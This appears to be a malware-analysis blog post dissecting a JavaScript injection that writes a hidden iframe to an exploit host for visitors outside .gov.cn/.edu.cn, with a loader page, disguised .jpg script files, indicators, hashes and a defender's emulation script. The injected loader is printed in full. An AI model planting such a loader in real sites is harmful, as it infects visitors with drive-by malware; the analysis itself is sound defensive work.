var s,siteUrl,tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn"); // hosts that will NOT be served the iframe
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7)); // host part of the page URL, assuming an "http://" prefix
tmpdomain = 0;
for(var i=0;i<arydomain.length; i++)
{
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1; // visitor is on an exempt (.gov.cn / .edu.cn) host
break;
}
}
if(tmpdomain == 0){
// everyone else gets a hidden 0x0 iframe pointing at the exploit host
document.writeln("<iframe src=http://bybyybyb.com/aa/a1a.htm?4 width=0 height=0></iframe>");
}
// a tongji.cn.yahoo.com hit counter, written regardless of the gate above
document.write ('<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/985098/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/985098/ystat.gif"/></a></noscript>');
From here we can see that it loads an iframe from bybyybyb.com (59.34.197.154 - AS4134) only when tmpdomain is zero, i.e. when the page's host does not match any of the entries in the arydomain array (visitors on .gov.cn and .edu.cn hosts are skipped). That iframe then loads another iframe, index.htm, which contains:
<html>
<body>
<div id="DivID">
<script src='go.jpg'></script>
<script src='go1.jpg'></script>
</body>
</html>
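To make the gating in the injected script at the top of this post concrete, here is an added example (not code from the original post or from the malware): it pulls the exempt-domain list out of the `new Array(...)` literal, recomputes siteUrl exactly as the injected code does, and reports whether a visitor on a given URL would be served the hidden iframe, plus the iframe URL as an indicator. SAMPLE is a constructed excerpt of the snippet above, and the function names are this example's own.

```javascript
// Added example (not code from the original post): a defender-side emulation
// of the gate in the injected script. SAMPLE is a constructed excerpt of the
// snippet above; exemptDomains/hiddenIframeSrc/wouldInject are our own names.

const SAMPLE = `var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location+"";
siteUrl=s.substring(7,s.indexOf('/',7));
if(tmpdomain == 0){
document.writeln("<iframe src=http://bybyybyb.com/aa/a1a.htm?4 width=0 height=0></iframe>");
}`;

// Extract the string literals from the exempt list (arydomain).
function exemptDomains(script) {
  const m = /new Array\(([^)]*)\)/.exec(script);
  if (!m) return [];
  return Array.from(m[1].matchAll(/["']([^"']+)["']/g), x => x[1]);
}

// Find the src of an iframe written with width=0 height=0; a zero-sized
// frame is the tell-tale of a drive-by loader rather than page content.
function hiddenIframeSrc(script) {
  const m = /<iframe[^>]*\bsrc=["']?([^"'\s>]+)[^>]*\bwidth=0\b[^>]*\bheight=0\b/i.exec(script);
  return m ? m[1] : null;
}

// Recompute the gate the way the malware does. substring(7, indexOf('/', 7))
// assumes an "http://" prefix and a path, and the host is compared with
// indexOf(), so any host merely containing ".gov.cn" or ".edu.cn" is skipped.
function wouldInject(script, pageUrl) {
  const siteUrl = pageUrl.substring(7, pageUrl.indexOf('/', 7));
  const exempt = exemptDomains(script).some(d => siteUrl.indexOf(d) > -1);
  return { siteUrl, exempt, injects: !exempt, iframeSrc: hiddenIframeSrc(script) };
}

console.log(wouldInject(SAMPLE, "http://www.example.com/news/1.html"));
console.log(wouldInject(SAMPLE, "http://www.city.gov.cn/index.htm"));
```

This also explains why an analyst browsing from a .gov.cn or .edu.cn host would see a clean page: the injection is simply never written for them.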
You'll not be surprised to learn that these .jpg files aren't, in fact, .jpg files. go.jpg contains the shellcode;
If we run this through Wepawet (saves us a lot of time), we see it grabs a file called svchost.exe from z999hu.cn (121.14.218.162 - AS4134), MD5: 78ffb67eb9e8ec2886fcb5e32c916333;
http://wepawet.cs.ucsb.edu/view.php?hash=92b82fa85cc9fb0206b7eca725c3ce42&type=js
Detection for this is pretty good, with 28/41 vendors currently detecting it;
http://www.virustotal.com/analisis/ebcf13901c7d5a12dc0a2f4e5e588276a9dfc1693672b61d1339933f77e0b04b-1247156133
go1.jpg attempts a buffer overflow (CVE-2008-0015), and detection is, sadly, rubbish;
http://www.virustotal.com/analisis/673d9d2ff901f08991354fe28798bfe7f18346492d1e5987caf788e4da79eee5-1247118784
References:
vURL Online - myb88.com/t.js
http://vurl.mysteryfcm.co.uk/?url=713642
hpHosts - 261 Domains listed resolving to: 59.34.197.
http://hosts-file.net/pest.asp?show=59.34.197.
Microsoft Security Advisory (972890) - Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/972890.mspx
Google Diagnostic - AS4134
http://www.google.com/safebrowsing/diagnostic?site=AS:4134&hl=en
IE 0day exploit domains (constantly updated)
http://isc.sans.org/diary.php?storyid=6739
IE (msvidctl.dll) to 0-day attack (Google translation)
http://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=IE(msvidctl.dll)+%A4%D8%A4%CE+0-day+attack
New MS 0-day ActiveX (MSVidCtl dll exploit)
http://infosec20.blogspot.com/2009/07/new-ms-0-day-activex-msvidctl-dll.html